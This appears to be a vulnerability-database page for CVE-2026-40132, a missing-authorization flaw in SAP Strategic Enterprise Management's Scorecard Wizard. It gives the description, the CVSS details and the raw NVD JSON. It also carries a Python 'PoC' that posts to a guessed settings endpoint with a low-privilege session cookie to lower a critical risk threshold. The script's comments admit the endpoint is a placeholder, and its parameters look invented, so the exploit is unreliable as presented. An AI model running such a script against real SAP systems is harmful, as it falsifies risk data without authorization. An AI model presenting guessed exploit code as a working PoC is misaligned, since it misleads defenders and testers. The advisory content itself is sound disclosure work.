Security Vulnerability Report
中文
CVE-2026-40132 CVSS 5.4 MEDIUM

CVE-2026-40132

Published: 2026-05-12 03:16:12
Last Modified: 2026-05-12 03:16:12
Source: [email protected]

Description

Due to missing authorization check in SAP Strategic Enterprise Management (Scorecard Wizard in Business Server Pages), an authenticated attacker could access information that they are otherwise unauthorized to view. This vulnerability also enables the attacker to change the default settings and modify value fields, which will mislead risk evaluations and falsely lower assessed risk levels. This results in a low impact on the confidentiality and integrity of the data. There is no impact on the application�s availability.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

SAP Strategic Enterprise Management (版本信息请参考 SAP Security Patch Day 2026)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target configuration # Replace with the actual vulnerable endpoint URL target_url = "https://[target_host]/sap/bc/bsp/sap/scorecard_wizard/settings.do" # Attacker's session cookie (obtained after low-privilege login) session_cookie = { "MYSAPSSO2": "...valid_sso2_token...", "sap-usercontext": "sap-language=EN&sap-client=100" } # Payload to modify value fields and mislead risk evaluation # This exploits the missing authorization check exploit_payload = { "action": "update_settings", "risk_field_id": "critical_risk_threshold", "new_value": "0.01", # Artificially lowering the risk level "default_view": "modified_view" } try: print("[*] Attempting to exploit CVE-2026-40132...") # Sending the request using the low-privilege session response = requests.post(target_url, data=exploit_payload, cookies=session_cookie, verify=False, timeout=10) if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Check if the default settings and risk values have been modified.") print("[+] Response body:") print(response.text[:200]) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[!] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-40132", "sourceIdentifier": "[email protected]", "published": "2026-05-12T03:16:12.043", "lastModified": "2026-05-12T03:16:12.043", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Due to missing authorization check in SAP Strategic Enterprise Management (Scorecard Wizard in Business Server Pages), an authenticated attacker could access information that they are otherwise unauthorized to view. This vulnerability also enables the attacker to change the default settings and modify value fields, which will mislead risk evaluations and falsely lower assessed risk levels. This results in a low impact on the confidentiality and integrity of the data. There is no impact on the application�s availability."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://me.sap.com/notes/3721959", "source": "[email protected]"}, {"url": "https://url.sap/sapsecuritypatchday", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.